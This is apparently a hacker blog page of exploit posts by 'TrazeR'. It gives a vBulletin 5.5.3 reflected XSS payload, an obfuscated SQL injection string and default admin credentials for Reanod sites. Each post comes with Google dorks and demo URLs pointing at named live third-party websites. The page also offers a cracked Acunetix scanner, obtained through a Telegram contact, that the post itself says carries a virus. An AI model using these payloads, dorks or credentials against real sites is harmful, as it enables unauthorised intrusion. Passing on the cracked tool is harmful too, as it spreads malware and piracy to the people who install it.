vBulletin Reflected XSS via "Click here"

# Exploit Title: vBulletin Reflected XSS via "Click here"
# Google Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538


#################################################################################

Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"

vBulletin 5.5.3 Reflected XSS via "Click here"

Payload:

/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

(Click here!) click here xss will work

Demo :

https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.scootersoftware.com/vbulletin//admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.photorials.nl/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://powerhacker.net/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

screenshot:


#################################################################################

> [Reference]
> https://hackerone.com/trazer
> https://www.trazer.org/
> https://www.cyber-warrior.org/194929/
> https://cxsecurity.com/author/TrazeR/1/

Designed by ORGINSTUDIOS.COM Sql İnjection Vulnerability



#################################################################################
# Exploit Title: Designed by ORGINSTUDIOS.COM Sql İnjection Vulnerability
# Author : TrazeR  & AKINCİLAR
# Google Dork : intext:"Designed by ORGINSTUDIOS.COM" inurl:catid
# Tested on : Windows 7
# Date : 01.07.2019
# Vendor Home: https://orginstudios.com/
# Blog : https://www.trazer.org/
# Forum : http://www.cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~# Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] GET parameter 'catid' is vulnerable

Demo: http://graphicarts.gr/portal/corp.php?catid=260'+and(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+aes_decrypt(aes_encrypt(%2f**%2fcOnCaT(0x217e21,%2f**%2fdAtAbAsE(),0x217e21),1),1))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)+and+'1'='1&cp=8&cntrid=


Demo 2 :  http://www.exaireton.com/mainsite/products.php?catid=37

Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: catid=-5607) OR 3893=3893-- HOfb

#AKINCILAR ! BU GÜCE SAYGI DUYUN !

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Acunetix 12.019* Linux Cracked

Acunetix 12.019 Dowloand Buradan son sürüm indirin. Kurulumla Crack İle İlgili Sorunlarınızı Telegram Üzerinden @seytan6161 İle İletişim Kurum


Command: chmod +777 patch_aws


Command:  
./acunetix-12.9.0.sh Yazarak İndirdiğiniz Dosyayi Çaliştirip Email Ve Şifre Belirleyin,

Not: Kurulum bitince size makine adres verecek (https://kali:3443/)
burdaki onemli olan link açmadan
tool çalıştırmadan patch yapmak

patch dosyasını bu adresde yetki yoksa yetkilendirip çalıştırıyoruz
bu adres kapalı ise gizli klosörleri açarak bulabilirsiniz

/home/acunetix/.acunetix_trial/v_19xxxxxx/scanner/

Crack : ./patch_aws

sorunsuz şekilde kullaabilirsiniz


Acunetix 12.x Full Cracked

Selamun Aleyküm ... Acunetix 12.x Sürümünü full yapmayi gösterdim, ek olarak 8. resimde bulduğu zafiyetleride gösteriyor. Resimlerde nasıl yapıldığı mevcut . Crack Viruslüdür localde kullanabilirsiniz
Dowloand Telegram: @Seytan6161 Selamımı iletip acunetix full cracki alabilirsiniz :) 










Burp Suite BurpBounty


Selamun Aleyküm ...

Burp Bounty (BApps Store'daki Adi Scan Check Builder), aktif ve pasif tarayicidir. Ben Manuel kurmayı tercih ettim. Sevdigim noktası payload listemizi ekleyebildiğimiz bir Burp Suite eklentisidir. Bu uzantı, Burp Suite Pro'yu gerektirir.

Dowloand: 
BurpBounty
BurpBounty-v2.3.jar

XSS PAYLOAD LİST

Video : 

Reanod Default Admin Password Vulnerability


#################################################################################
# Exploit Title: Reanod Default Admin Password Vulnerability
# Author : TrazeR & AKINCILAR
# Google Dork : intext:"Powered by reanod"
# Tested on : Kali Linux & Windows
# Date : 09.19.2018
# Vendor Home: http://www.reanod.com/
# Blog : http://www.trazer.org/
# Forum : http://cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~#
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Manager-Url: /admin
[+] UserName: Reanod68 OR ===> admin
[+] Password: reanod6688

Demo:
http://www.ricemachinechina.com/admin.php

http://www.epic-crystal.com/wp-login.php

http://www.ynfmachineryparts.com/admin/

Greet'Z : AKINCILAR & Cyber-WarrioR.org And All Members

BU GÜCE SAYGI DUYUN !
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]